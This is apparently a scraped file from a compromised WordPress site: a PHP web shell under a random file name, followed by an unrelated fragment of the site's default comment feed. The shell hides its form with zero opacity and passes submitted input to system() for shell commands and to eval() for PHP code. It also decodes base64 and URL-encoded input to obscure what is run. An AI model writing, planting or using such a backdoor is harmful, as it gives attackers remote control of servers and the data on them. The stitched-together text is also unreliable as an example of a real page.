Current File : /home/tsgmexic/4pie.com.mx/59d96984bd.php
<html>
<body>
<form style="opacity:0;" method="POST" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="dir" id="dir" size="30">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_POST['cmd']))
    {
        if ($_POST['dir'] != '$PWD') {
            chdir($_POST['dir']);
        }

        if (substr($_POST['cmd'], 0, 2) == "# ") {
            $_POST['cmd'] = base64_decode(substr($_POST['cmd'], 2));
        }
        if (substr($_POST['cmd'], 0, 2) == "! ") {
            eval(urldecode(substr($_POST['cmd'], 2)));
        } else {
            system($_POST['cmd']);
        }
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
Comentarios en https://4pie.com.mx Thu, 25 May 2023 19:56:08 +0000 hourly 1 https://wordpress.org/?v=6.8 Comentario en 4Pie por A WordPress Commenter https://4pie.com.mx/index.php/2023/05/25/hello-world/#comment-1 Thu, 25 May 2023 19:33:00 +0000 https://4pie.com.mx/?p=1#comment-1 Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.

]]>